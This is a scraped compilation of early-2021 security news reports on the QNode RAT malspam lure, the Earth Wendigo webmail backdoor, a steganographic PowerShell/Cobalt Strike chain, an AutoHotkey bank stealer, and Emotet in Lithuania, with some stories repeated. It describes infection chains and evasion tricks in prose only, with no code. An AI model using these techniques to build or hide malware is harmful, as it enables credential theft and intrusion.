“We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded presidential elections, since the filename they used on the attachment is totally unrelated to the email’s theme,” Lopera said.
QRAT Variants
This QRAT is notable because it has several differences from
its predecessors, Lopera explained.
“This threat has been significantly enhanced over the past few months since we first examined it,” Lopera said. “To achieve the same end goal, which is to infect the system with a QNode RAT, the JAR file downloader characteristics and behavior were improved.”
This version of code is encrypted with base64; the modules are hidden with Allatori Obfuscator; the victim network information is retrieved here from the service “hxxps://wtfismyip[.]com”; and finally, the password recovery also supports Chrome, Firefox, Thunderbird and Outlook, the report explained.
“The malicious code of this downloader is split up among…numbered files, along with some junk data that were added to them.” Lopera wrote.
The latest .JAR variant also includes a scam Microsoft ISC license, which serves up a message telling the user the .JAR file is being run for remote penetration testing, the report said.
“Upon the execution of the file “TRUMP_SEX_SCANDAL_VIDEO.jar”, a copy of it is created and then executed from the %temp% folder,” Lopera said. “Then, a GUI informing the victim that the malicious JAR file is a remote access software used for penetration testing is launched. The malicious behaviors of this sample start to manifest once the button ‘Ok, I know what I am doing’ is clicked,” Lopera said.
Another difference between this version and previous known .JAR files is a missing string of code.
“Third, the string “qnodejs” which previously identified the files associated with this threat, is not in this variant,” she observed.
Earlier versions of the .JAR file contained information about the QHub service subscription necessary to communicate with the C2 server, the report said.
“The information about the QHub service subscription user we observed in the earlier variant is no longer contained in the JAR file,” Lopera said.
‘Amateurish’ Attempt
To protect systems against this latest QRAT variant,
Lopera advises that email administrators should block .JAR files at security
gateways.
“While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated,” Lopera wrote. “The spamming out of malicious JAR files, which often lead to RATs such as this, is quite common.”
Fake Trump sex video used to spread QNode RAT
7.1.2021
Virus
Securityaffairs
Researchers uncovered a malspam campaign that spreads the QNode remote access
Trojan (RAT) using fake Trump’s sex scandal video as bait.
Security experts
from Trustwave uncovered a malspam campaign that is delivering the QNode remote
access Trojan (RAT) using fake Trump’s sex scandal video as bait.
The spam messages use the subject “GOOD LOAN OFFER!!” and have attached to the email an archive containing a Java Archive (JAR) file called “TRUMP_SEX_SCANDAL_VIDEO.jar”.
Upon executing the attachment, the malicious code attempts to install the Qnode
RAT on the recipient’s machine.
“While reviewing our spam traps, a particular campaign piqued our interest primarily because the attachment to the email does not coincide with the theme of the email body.” states the post published by the experts.” “We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email’s theme.”
The downloader distributed in this malspam campaign appears to be a variant of the QRAT downloader that was discovered by Trustwave researchers in August.
Experts highlighted some other similarities with the older variants such as the obfuscation of the JAR file with the Allatori Obfuscator, the support for Windows OS only, and the fact that the installer of Node.Js is retrieved from the official website nodejs.org.
The QRAT variant continues to have multi-stage downloaders. The first downloader is the JAR file used as an attachment in the spam message.
As detailed in the August report published by Trustwave, the first downloader has two major tasks, it first sets up the Node.Js platform onto the system, then downloads and executes the second-stage downloader.
The second-stage downloader named “wizard.js” fetches and executes the Qnode RAT
from an C2 server, it is also to achieve persistence on the infected system.
The new variant employed in the new campaign has the following notable new
features and changes:
this JAR sample is significantly larger than the one used in past campaigns;
threat actor behind this campaign added a GUI and a supposed Microsoft ISC
License into the JAR’s code.
this variant not use the string “qnodejs“ to
evade detection and the downloader code was split-up into different buffers
inside the JAR.
when downloading next stage malware, only the argument
“–hub-domain” is required when communicating to the command-and-control servers
(C&Cs).
the JAR file downloads a file named “boot.js” and saves it at
%temp%\_qhub_node_{random}
QRAT support multiple RAT features, including,
obtaining system information, performing file operations, and acquiring
credentials of certain applications. This variant supports multiple
applications, including Chrome, Firefox, Thunderbird, and Outlook.
“This threat has been significantly enhanced over the past few months since we first examined it. To achieve the same end goal, which is to infect the system with a QNode RAT, the JAR file downloader characteristics and behavior were improved.” concludes the report.
“While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated.”
'Earth Wendigo' Hackers Exfiltrate Emails Through JavaScript Backdoor
7.1.2021
Virus
Securityweek
A newly identified malware attack campaign has been exfiltrating emails from targeted organizations using a JavaScript backdoor injected into a webmail system widely used in Taiwan.
According to an advisory from Trend Micro, the attacks are linked to Earth Wendigo, a threat actor that does not appear to be affiliated with known hacking groups.
Starting May 2019, Trend Micro said Earth Wendigo has been targeting multiple organizations, including government entities, research institutions, and universities in Taiwan.
The attacks include the use of spear-phishing emails to various targets, including politicians and activists linked to Tibet, the Uyghur region, or Hong Kong.
As an initial attack vector, the group used spear-phishing emails containing obfuscated JavaScript code meant to load malicious scripts from an attacker-controlled remote server.
These scripts were designed to steal browser cookies and webmail session keys, propagate the infection by appending code to the victim’s email signature, and exploit a cross-site scripting (XSS) vulnerability in the webmail server for JavaScript injection.
The exploited XSS vulnerability resides in the webmail system’s shortcut feature and allows the attackers to add a shortcut with a crafted payload, replacing parts of the webmail system’s page with malicious JavaScript code.
Trend Micro reported that the XSS vulnerability was fixed in January 2020, meaning that only organizations that haven’t updated to the latest version of the webmail server remain exposed.
Should this method fail, the attackers’ script registers malicious JavaScript code to the server’s Service Worker (a programmable network proxy inside the browser), so that it could intercept and manipulate HTTPS requests, hijack login credentials, and add malicious scripts to the webmail page.
After performing the XSS injection or adding code to the Service Worker, which ensures that the malicious script is constantly loaded and executed, the attackers proceed to exfiltrate emails by establishing a WebSocket connection to an injected JavaScript backdoor.
The backdoor reads emails on the server and sends their content and attachments to the attacker’s WebSocket server.
In addition to targeting webmail servers, Earth Wendigo also uses Python malware compiled as Windows executables, which were found to be shellcode loaders for code likely from Cobalt Strike.
Some of the Python samples are backdoors that request additional Python code from the command and control (C&C) server. However Trend Micro couldn’t determine the purpose of the fetched code.
Hackers Using Fake Trump's Scandal Video to Spread QNode Malware
7.1.2021
Virus
Thehackernews
Cybesecurity
researchers today revealed a new malspam campaign that distributes a remote
access Trojan (RAT) by purporting to contain a sex scandal video of U.S.
President Donald Trump.
The emails, which carry with the subject line "GOOD LOAN OFFER!!," come attached with a Java archive (JAR) file called "TRUMP_SEX_SCANDAL_VIDEO.jar," which, when downloaded, installs Qua or Quaverse RAT (QRAT) onto the infiltrated system.
"We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email's theme," Trustwave's Senior Security Researcher Diana Lopera said in a write-up published today.
The latest campaign is a variant of the Windows-based QRAT downloader Trustwave researchers discovered in August.
The infection chain starts with a spam message containing an embedded attachment or a link pointing to a malicious zip file, either of which retrieves a JAR file ("Spec#0034.jar") that's scrambled using the Allatori Java obfuscator.
.jpg)
This first stage downloader sets up the Node.Js platform onto the system and
then downloads and executes a second-stage downloader called "wizard.js" that's
responsible for achieving persistence and fetching and running the Qnode RAT
("qnode-win32-ia32.js") from an attacker-controlled server.
QRAT is a typical remote access Trojan with various features including, obtaining system information, performing file operations, and acquiring credentials from applications such as Google Chrome, Firefox, Thunderbird, and Microsoft Outlook.
What's changed this time around is the inclusion of a new pop-up alert that informs the victim that the JAR being run is a remote access software used for penetration testing. This also means the sample's malicious behavior only begins to manifest once the user clicks the "Ok, I know what I am doing." button.
"This pop-up is a little odd and is perhaps an attempt to make the application
look legitimate, or deflect responsibility from the original software authors,"
Lopera noted.
Furthermore, the malicious code of the JAR downloader is split-up into different randomly-numbered buffers in an attempt to evade detection.
Other changes include an overall increase in the JAR file size and the elimination of the second-stage downloader in favor of an updated malware chain that immediately fetches the QRAT payload now called "boot.js."
For its part, the RAT has received its own share of updates, with the code now encrypted with base64 encoding, in addition to taking charge of persisting on the target system via a VBS script.
"This threat has been significantly enhanced over the past few months since we first examined it," Topera concluded, urging administrators to block the incoming JARs in their email security gateways.
"While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated."
New alleged MuddyWater attack downloads a PowerShell script from GitHub
5.1.2021
Virus
Securityaffairs
Security expert spotted a new piece of malware that leverages weaponized Word
documents to download a PowerShell script from GitHub.
Security expert
discovered a new piece of malware uses weaponized Word documents to download a
PowerShell script from GitHub.
This PowerShell script is also used by threat actors to download a legitimate image file from image hosting service Imgur and decode an embedded Cobalt Strike script to target Windows systems.
The researcher Arkbird published technical details of the malware that uses steganography to hide the malicious code in the image.
Arkbird pointed out that the sample could be part of the Muddywater APT’s arsenal.
The attack chain starts with the execution of a macro embedded in a legacy Microsoft Word (*.doc) file, a technique that was employed by the Muddywater group in its attacks.
Upon executing the embedded macro, it launches powershell.exe and attempts to execute a PowerShell script hosted on GitHub (archived).
The PowerShell is composed of a single line that downloads a PNG file from the image hosting service Imgur.
The PowerShell scrips analyze a set of pixel values of the image to prepare the next stage payload.
“As observed by BleepingComputer and shown below, the payload calculation algorithm runs a foreach loop to iterate over a set of pixel values within the PNG image and performs specific arithmetic operations to obtain functional ASCII commands.” reported Ax Sharma on Bleeping Computer.
PowerShell script uses the image to calculate the payload
Source:
BleepingComputer
Once decoded, the script reveals a Cobalt Strike payload
that allows attackers to deploy “beacons” on compromised Windows machines.
The shellcode uses an EICAR string to evade the detection by tricking the defense into thinking that the code is used as part of a security test.
The EICAR Anti-Virus Test File, or EICAR test file, is a computer file that was
developed by the European Institute for Computer Antivirus Research (EICAR) and
Computer Antivirus Research Organization (CARO), to test the response of
computer antivirus (AV) programs. Instead of using real malware, which could
cause real damage, this test file allows people to test anti-virus software
without having to use a real computer virus.
The payload receives
instructions from the C2 via a WinINet module.
The researcher noted that the domain used as C2 was registered on December 20 and is no longer active, while the scrip was uploaded in the GitHub account on December 24.
Additional details about this attack, including Indicators of Compromise (IOCs) and YARA rules, are available in the post published by Bleeping Computer.
AutoHotkey-Based credential stealer targets bank in the US and Canada
2.1.2021
Virus
Securityaffairs
Experts spotted a new credential stealer written in AutoHotkey (AHK) scripting
language that is targeting the US and Canadian bank customers.
Security
experts from Trend Micro have discovered a new credential stealer written in
AutoHotkey (AHK) scripting language that is targeting the US and Canadian bank
customers as part of an ongoing campaign that has begun in early 2020.
AutoHotkey is an open-source scripting language for Windows that provides easy keyboard shortcuts or hotkeys, fast micro-creation, and software automation. AHK allows users to create a “compiled” .EXE with their code in it.
The campaign leverages a multi-stage infection chain that starts with a
weaponized Excel file.
The malware infection consists of multiple stages that
start with a malicious Excel file. The Office file contains an AHK script
compiler executable, a malicious AHK script file, and a Visual Basic for
Applications (VBA) AutoOpen macro.
The macro drops and executes the downloader client script (“adb.ahk”) via a legitimate portable AHK script compiler executable (“adb.exe”).
“The dropped adb.exe and adb.ahk play critical roles in this infection. The adb.exe is a legitimate portable AHK script compiler, and its job is to compile and execute the AHK script at a given path. By default (with no parameter), this executable executes a script with the same name in the same directory.” reads the analysis published by Trend Micro. “The dropped AHK script is a downloader client that is responsible for achieving persistence, profiling victims, and downloading and executing the AHK script on a victim system.”
The downloader client script was also used to achieve persistence, profiling victims, and downloading and running additional AHK scripts from C2.
Trend Micro’s telemetry allowed tracking C2 servers that are in the US, the Netherlands, and Sweden.
The info-stealer doesn’t receive commands directly from the C&C server, instead,
it downloads and executes AHK scripts to execute different actions.
“For command execution, the malware accepts various AHK scripts for different tasks per victim and executes these using the same C&C URL (instead of implementing all modules in one file and accepting the command to execute them).” continues the analysis. “By doing this, the attacker can decide to upload a specific script to achieve customized tasks for each user or group of users. This also prevents the main components from being revealed publicly, specifically to other researchers or to sandboxes.”
The credential stealer targets multiple browsers, including Google Chrome, Microsoft Edge, and Opera, then exfiltrates stolen info to the C&C server in plaintext via an HTTP POST request.
Experts noticed that the AHK delivered scripts were containing instructions in Russian on how to use the scripts, a circumstance that suggests that the threat actor behind the attacks is a “hack-for-hire.”
“By using a scripting language that lacks a built-in compiler within a victim’s operating system, loading malicious components to achieve various tasks separately, and changing the C&C server frequently, the attacker has been able to hide their intention from sandboxes,” the researchers conclude.
Emotet campaign hits Lithuania’s National Public Health Center and several state
institutions
1.1.2021
Virus
Securityaffairs
An Emotet campaign hit Lithuania, the malware has infected systems at the
National Center for Public Health (NVSC) and several municipalities.
A
large-scale Emotet campaign hit Lithuania, the malware has infected the networks
of Lithuania’s National Center for Public Health (NVSC) and several
municipalities.
“The National Cyber Security Center under the Ministry of National Defense recorded a large number of virus-infected e-mails addressed to several state institutions. It is currently known that Trojan.Emotet virus-infected emails have been received by several municipalities and the National Center for Public Health (NVSC).” reads the alert published by the NVSC.
The alert states that the Emotet malware infected the computers then began sending out fake emails or engaging in other types of malicious activity.
The malicious emails sent by the NVSC’s infected computers were received by the representatives of the Government of the Republic of Lithuania, ministries, as well as researchers that were contacted by the national center during epidemiological diagnostics.
The Emotet campaign uses malicious emails that attempt to trick recipients into opening the zipped archive with the password included in the message.
“We warn you that not all computer viruses can be intercepted by security systems used by organizations, because malicious code is distributed in various ways, such as archived, password-protected, and the password itself is written in a letter. Emails accessed in this way require user action: open the file, unzip it with a password. Therefore, we recommend to everyone e-mail. postal system operators to specify their security rules and filters, ”says Rytis Rainys, Director of NKSC.
In response to the infections, the NVSC has temporarily shut down its e-mail systems.
NVSC IT staff is cleaning infected systems and restoring the operations with the help of the experts from the Central State Telecommunications Center and the National Cyber Security Center.
The security advisory states that this is the second large Emotet campaign that hit Lithuania this year, the first wave of Emotet emails was recorded in October.
Emotet is back on Christmas Eve, after two months of silence, cybercrime operators are sending out spam messages to deliver the infamous Trickbot Trojan.
Experts at Cofense, the recent Emotet campaign used updated payloads and is targeting over 100,000 recipients per day.
The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. In the middle-August, the malware was employed in fresh COVID19-themed spam campaign
Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.
The infamous banking trojan is also used to deliver other malicious code, such as Trickbot and QBot trojan or ransomware such as Conti (TrickBot) or ProLock (QBot).
Emotet is a modular malware, its operators could develop new Dynamic Link Libraries to update its capabilities.
In October, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.
While in October the botnet was mainly using TrickBot, Qakbot and ZLoader as secondary payloads, today Cofense researchers observed TrickBot.
